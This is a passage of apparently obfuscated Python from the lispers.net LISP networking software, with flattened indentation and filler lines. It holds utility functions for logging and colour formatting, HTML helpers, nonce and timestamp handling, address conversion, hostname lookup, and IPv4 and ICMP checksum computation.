if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
def debug ( * args ) :
lisp_process_logfile ( )
if 62 - 62: i1IIi - OoOoOO00
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
i1 = i1 [ : - 3 ]
if 62 - 62: i1IIi + Oo0Ooo % IiII
print ( red ( ">>>" , False ) , end = " " )
print ( "{}:" . format ( i1 ) , end = " " )
for Ii1 in args : print ( Ii1 , end = " " )
print ( red ( "<<<\n" , False ) )
try : sys . stdout . flush ( )
except : pass
return
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
def lisp_print_caller ( ) :
fprint ( traceback . print_last ( ) )
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
if 89 - 89: II111iiii / oO0o
def lisp_print_banner ( string ) :
global lisp_version , lisp_hostname
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if ( lisp_version == "" ) :
lisp_version = getoutput ( "cat lisp-version.txt" )
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
OOooo00 = bold ( lisp_hostname , False )
lprint ( "lispers.net LISP {} {}, version {}, hostname {}" . format ( string ,
datetime . datetime . now ( ) , lisp_version , OOooo00 ) )
return
if 35 - 35: I1Ii111 . OoOoOO00 * i11iIiiIii
if 44 - 44: i11iIiiIii / Oo0Ooo
if 42 - 42: OoooooooOO + Oo0Ooo % II111iiii + OoO0O00
if 24 - 24: iII111i * II111iiii % iII111i % IiII + OoooooooOO
if 29 - 29: II111iiii - OoooooooOO - i11iIiiIii . o0oOOo0O0Ooo
if 19 - 19: II111iiii
if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
def green ( string , html ) :
if ( html ) : return ( '<font color="green"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[92m" + string + "\033[0m" , html ) )
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
def green_last_sec ( string ) :
return ( green ( string , True ) )
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
def green_last_min ( string ) :
return ( '<font color="#58D68D"><b>{}</b></font>' . format ( string ) )
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
if 49 - 49: I1ii11iIi11i
if 84 - 84: I11i - Oo0Ooo / O0 - I1Ii111
if 21 - 21: O0 * O0 % I1ii11iIi11i
if 94 - 94: I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
def red ( string , html ) :
if ( html ) : return ( '<font color="red"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[91m" + string + "\033[0m" , html ) )
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
def blue ( string , html ) :
if ( html ) : return ( '<font color="blue"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[94m" + string + "\033[0m" , html ) )
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
def bold ( string , html ) :
if ( html ) : return ( "<b>{}</b>" . format ( string ) )
return ( "\033[1m" + string + "\033[0m" )
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
if 6 - 6: IiII * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / i1IIi
if 53 - 53: I11i + iIii1I11I1II1
if 70 - 70: I1ii11iIi11i
def convert_font ( string ) :
oo0O = [ [ "[91m" , red ] , [ "[92m" , green ] , [ "[94m" , blue ] , [ "[1m" , bold ] ]
II = "[0m"
if 28 - 28: IiII - IiII . i1IIi - ooOoO0o + I1IiiI . IiII
for oO0ooOOO in oo0O :
iIi1I1 = oO0ooOOO [ 0 ]
O0oOoo0OoO0O = oO0ooOOO [ 1 ]
oo00 = len ( iIi1I1 )
OOOooo0OooOoO = string . find ( iIi1I1 )
if ( OOOooo0OooOoO != - 1 ) : break
if 33 - 33: iIii1I11I1II1 / iII111i - I1IiiI * I11i
if 53 - 53: ooOoO0o
while ( OOOooo0OooOoO != - 1 ) :
o0oO0oo0000OO = string [ OOOooo0OooOoO : : ] . find ( II )
I1i1ii1IiIii = string [ OOOooo0OooOoO + oo00 : OOOooo0OooOoO + o0oO0oo0000OO ]
string = string [ : OOOooo0OooOoO ] + O0oOoo0OoO0O ( I1i1ii1IiIii , True ) + string [ OOOooo0OooOoO + o0oO0oo0000OO + oo00 : : ]
if 69 - 69: OoOoOO00 % oO0o - I11i
OOOooo0OooOoO = string . find ( iIi1I1 )
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
if 62 - 62: o0oOOo0O0Ooo - Ii1I * OoOoOO00 - i11iIiiIii % ooOoO0o
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if 30 - 30: iII111i / OoO0O00 + oO0o
if ( string . find ( "[1m" ) != - 1 ) : string = convert_font ( string )
return ( string )
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if 70 - 70: OoO0O00
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
def lisp_space ( num ) :
oOo0OOoooO = ""
for iIi1iIIIiIiI in range ( num ) : oOo0OOoooO += " "
return ( oOo0OOoooO )
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
def lisp_button ( string , url ) :
I11 = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'
if 100 - 100: I1ii11iIi11i + i11iIiiIii - i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if ( url == None ) :
i111II = I11 + string + "</button>"
else :
OO0O00o0 = '<a href="{}">' . format ( url )
I111 = lisp_space ( 2 )
i111II = I111 + OO0O00o0 + I11 + string + "</button></a>" + I111
if 36 - 36: i11iIiiIii / oO0o * I1ii11iIi11i * I1ii11iIi11i + Ii1I * I11i
return ( i111II )
if 32 - 32: OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
def lisp_print_cour ( string ) :
oOo0OOoooO = '<font face="Courier New">{}</font>' . format ( string )
return ( oOo0OOoooO )
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
def lisp_print_sans ( string ) :
oOo0OOoooO = '<font face="Sans-Serif">{}</font>' . format ( string )
return ( oOo0OOoooO )
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
def lisp_span ( string , hover_string ) :
oOo0OOoooO = '<span title="{}">{}</span>' . format ( hover_string , string )
return ( oOo0OOoooO )
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
def lisp_eid_help_hover ( output ) :
Ooo = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
if 73 - 73: ooOoO0o + oO0o . OoO0O00
if 46 - 46: OoO0O00 - o0oOOo0O0Ooo / OoOoOO00 - OoooooooOO + oO0o
OOOO = lisp_span ( output , Ooo )
return ( OOOO )
if 37 - 37: I11i - OoOoOO00 . iIii1I11I1II1 % ooOoO0o % Ii1I * OoOoOO00
if 8 - 8: OoOoOO00 . ooOoO0o % oO0o . I1IiiI % I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
def lisp_geo_help_hover ( output ) :
Ooo = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
if 60 - 60: OoO0O00
if 81 - 81: OoOoOO00 % Ii1I
OOOO = lisp_span ( output , Ooo )
return ( OOOO )
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
def space ( num ) :
oOo0OOoooO = ""
for iIi1iIIIiIiI in range ( num ) : oOo0OOoooO += " "
return ( oOo0OOoooO )
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
if 93 - 93: I1Ii111 + Ii1I
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * OoO0O00
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
if 58 - 58: IiII + iIii1I11I1II1
def lisp_get_ephemeral_port ( ) :
return ( random . randrange ( 32768 , 65535 ) )
if 65 - 65: II111iiii - I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 * iII111i + Ii1I
if 79 - 79: ooOoO0o . OoOoOO00 % I1Ii111 - Oo0Ooo
if 69 - 69: ooOoO0o - o0oOOo0O0Ooo . ooOoO0o
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
def lisp_get_data_nonce ( ) :
return ( random . randint ( 0 , 0xffffff ) )
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
def lisp_get_control_nonce ( ) :
return ( random . randint ( 0 , ( 2 ** 64 ) - 1 ) )
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
def lisp_hex_string ( integer_value ) :
oOO0 = hex ( integer_value ) [ 2 : : ]
if ( oOO0 [ - 1 ] == "L" ) : oOO0 = oOO0 [ 0 : - 1 ]
return ( oOO0 )
if 15 - 15: Oo0Ooo + I11i . ooOoO0o - iIii1I11I1II1 / O0 % iIii1I11I1II1
if 86 - 86: I1IiiI / oO0o * Ii1I
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
def lisp_get_timestamp ( ) :
return ( time . time ( ) )
if 65 - 65: OoOoOO00
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
if 95 - 95: Ii1I % IiII . O0 % I1Ii111
if 68 - 68: Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . ooOoO0o / i1IIi
if 12 - 12: I1ii11iIi11i * i1IIi * I11i
if 23 - 23: OOooOOo / O0 / I1IiiI
def lisp_set_timestamp ( seconds ) :
return ( time . time ( ) + seconds )
if 49 - 49: I11i . o0oOOo0O0Ooo % oO0o / Ii1I
if 95 - 95: O0 * OoOoOO00 * IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
if 77 - 77: Oo0Ooo
def lisp_print_elapsed ( ts ) :
if ( ts == 0 or ts == None ) : return ( "never" )
i1i111Iiiiiii = time . time ( ) - ts
i1i111Iiiiiii = round ( i1i111Iiiiiii , 0 )
return ( str ( datetime . timedelta ( seconds = i1i111Iiiiiii ) ) )
if 19 - 19: I1IiiI . Oo0Ooo + OoooooooOO - I1IiiI
if 93 - 93: iIii1I11I1II1 + I1IiiI + i11iIiiIii
if 74 - 74: I11i / II111iiii + ooOoO0o * iIii1I11I1II1 - I1Ii111 - OoO0O00
if 69 - 69: iIii1I11I1II1 * I1IiiI - iII111i + O0 + O0
if 65 - 65: I1Ii111 / i11iIiiIii / OoO0O00 - OOooOOo
if 9 - 9: I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
def lisp_print_future ( ts ) :
if ( ts == 0 ) : return ( "never" )
I11i11I = ts - time . time ( )
if ( I11i11I < 0 ) : return ( "expired" )
I11i11I = round ( I11i11I , 0 )
return ( str ( datetime . timedelta ( seconds = I11i11I ) ) )
if 90 - 90: I1ii11iIi11i
if 9 - 9: IiII + ooOoO0o
if 7 - 7: O0 % I1Ii111 + I1ii11iIi11i + Ii1I % OoooooooOO . Oo0Ooo
if 56 - 56: iII111i
if 84 - 84: OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
def lisp_print_eid_tuple ( eid , group ) :
i1iiii = eid . print_prefix ( )
if ( group . is_null ( ) ) : return ( i1iiii )
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
IIiI11I1I1i1i = group . print_prefix ( )
oooo = group . instance_id
if 70 - 70: Ii1I . i11iIiiIii % Ii1I . O0 - iIii1I11I1II1
if ( eid . is_null ( ) or eid . is_exact_match ( group ) ) :
OOOooo0OooOoO = IIiI11I1I1i1i . find ( "]" ) + 1
return ( "[{}](*, {})" . format ( oooo , IIiI11I1I1i1i [ OOOooo0OooOoO : : ] ) )
if 26 - 26: OOooOOo
if 76 - 76: i1IIi * OoooooooOO * O0 + I1Ii111 * I1Ii111
i1iIiIii = eid . print_sg ( group )
return ( i1iIiIii )
if 20 - 20: o0oOOo0O0Ooo * ooOoO0o
if 10 - 10: I11i - Oo0Ooo
if 59 - 59: OoooooooOO * Oo0Ooo + i1IIi
if 23 - 23: ooOoO0o
if 13 - 13: iIii1I11I1II1
if 77 - 77: i11iIiiIii - iIii1I11I1II1 / oO0o / ooOoO0o / OoO0O00
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
def lisp_convert_6to4 ( addr_str ) :
if ( addr_str . find ( "::ffff:" ) == - 1 ) : return ( addr_str )
IiI = addr_str . split ( ":" )
return ( IiI [ - 1 ] )
if 60 - 60: I1Ii111
if 98 - 98: ooOoO0o
if 34 - 34: iIii1I11I1II1 * I11i * I11i / I1ii11iIi11i
if 28 - 28: OoO0O00 - oO0o + OoOoOO00 + Ii1I / iIii1I11I1II1
if 26 - 26: iIii1I11I1II1 - O0 . O0
if 68 - 68: OOooOOo + oO0o . O0 . Ii1I % i1IIi % OOooOOo
if 50 - 50: IiII + o0oOOo0O0Ooo
if 96 - 96: OoO0O00
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
def lisp_convert_4to6 ( addr_str ) :
IiI = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
if ( IiI . is_ipv4_string ( addr_str ) ) : addr_str = "::ffff:" + addr_str
IiI . store_address ( addr_str )
return ( IiI )
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
def lisp_gethostbyname ( string ) :
Oo00O0OO = string . split ( "." )
oOOOoo0o = string . split ( ":" )
iiiI1IiIIii = string . split ( "-" )
if 25 - 25: I1ii11iIi11i + oO0o + OoooooooOO . II111iiii . iII111i
if ( len ( Oo00O0OO ) == 4 ) :
if ( Oo00O0OO [ 0 ] . isdigit ( ) and Oo00O0OO [ 1 ] . isdigit ( ) and Oo00O0OO [ 2 ] . isdigit ( ) and
Oo00O0OO [ 3 ] . isdigit ( ) ) : return ( string )
if 66 - 66: ooOoO0o * OoOoOO00
if ( len ( oOOOoo0o ) > 1 ) :
try :
int ( oOOOoo0o [ 0 ] , 16 )
return ( string )
except :
pass
if 2 - 2: oO0o . I1Ii111 * Oo0Ooo + O0 - I11i * iIii1I11I1II1
if 12 - 12: o0oOOo0O0Ooo * I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if ( len ( iiiI1IiIIii ) == 3 ) :
for iIi1iIIIiIiI in range ( 3 ) :
try : int ( iiiI1IiIIii [ iIi1iIIIiIiI ] , 16 )
except : break
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
try :
IiI = socket . gethostbyname ( string )
return ( IiI )
except :
if ( lisp_is_alpine ( ) == False ) : return ( "" )
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
try :
IiI = socket . getaddrinfo ( string , 0 ) [ 0 ]
if ( IiI [ 3 ] != string ) : return ( "" )
IiI = IiI [ 4 ] [ 0 ]
except :
IiI = ""
if 43 - 43: Oo0Ooo . I1Ii111
return ( IiI )
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
def lisp_ip_checksum ( data , hdrlen = 20 ) :
if ( len ( data ) < hdrlen ) :
lprint ( "IPv4 packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
O0O = binascii . hexlify ( data )
if 80 - 80: iIii1I11I1II1
if 23 - 23: II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
ii1II1II = 0
for iIi1iIIIiIiI in range ( 0 , hdrlen * 2 , 4 ) :
ii1II1II += int ( O0O [ iIi1iIIIiIiI : iIi1iIIIiIiI + 4 ] , 16 )
if 42 - 42: Ii1I
if 68 - 68: OOooOOo . Oo0Ooo % ooOoO0o - OoooooooOO * iII111i . OOooOOo
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
if 5 - 5: O0 / ooOoO0o . Oo0Ooo + OoooooooOO
if 97 - 97: IiII . Ii1I . Ii1I / iIii1I11I1II1 - OoO0O00 + iII111i
ii1II1II = ( ii1II1II >> 16 ) + ( ii1II1II & 0xffff )
ii1II1II += ii1II1II >> 16
ii1II1II = socket . htons ( ~ ii1II1II & 0xffff )
if 32 - 32: OOooOOo . o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
if 76 - 76: OoO0O00 - i11iIiiIii + OoOoOO00 + OOooOOo / OoooooooOO
if 50 - 50: II111iiii - I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1
if 91 - 91: II111iiii - O0 . iIii1I11I1II1 . O0 + I1ii11iIi11i - II111iiii
ii1II1II = struct . pack ( "H" , ii1II1II )
O0O = data [ 0 : 10 ] + ii1II1II + data [ 12 : : ]
return ( O0O )
if 26 - 26: o0oOOo0O0Ooo
if 12 - 12: OoooooooOO / O0 + II111iiii * I1ii11iIi11i
if 46 - 46: II111iiii - IiII * OoooooooOO / oO0o % IiII
if 11 - 11: iIii1I11I1II1 . OoOoOO00 / IiII % ooOoO0o
if 61 - 61: ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
def lisp_icmp_checksum ( data ) :
if ( len ( data ) < 36 ) :
lprint ( "ICMP packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
IIii1III = binascii . hexlify ( data )
if 94 - 94: i11iIiiIii % OoooooooOO / I1IiiI
if 24 - 24: I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
ii1II1II = 0
for iIi1iIIIiIiI in range ( 0 , 36 , 4 ) :
ii1II1II += int ( IIii1III [ iIi1iIIIiIiI : iIi1iIIIiIiI + 4 ] , 16 )
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
ii1II1II = ( ii1II1II >> 16 ) + ( ii1II1II & 0xffff )
ii1II1II += ii1II1II >> 16
ii1II1II = socket . htons ( ~ ii1II1II & 0xffff )
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
ii1II1II = struct . pack ( "H" , ii1II1II )
IIii1III = data [ 0 : 2 ] + ii1II1II + data [ 4 : : ]
return ( IIii1III )
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
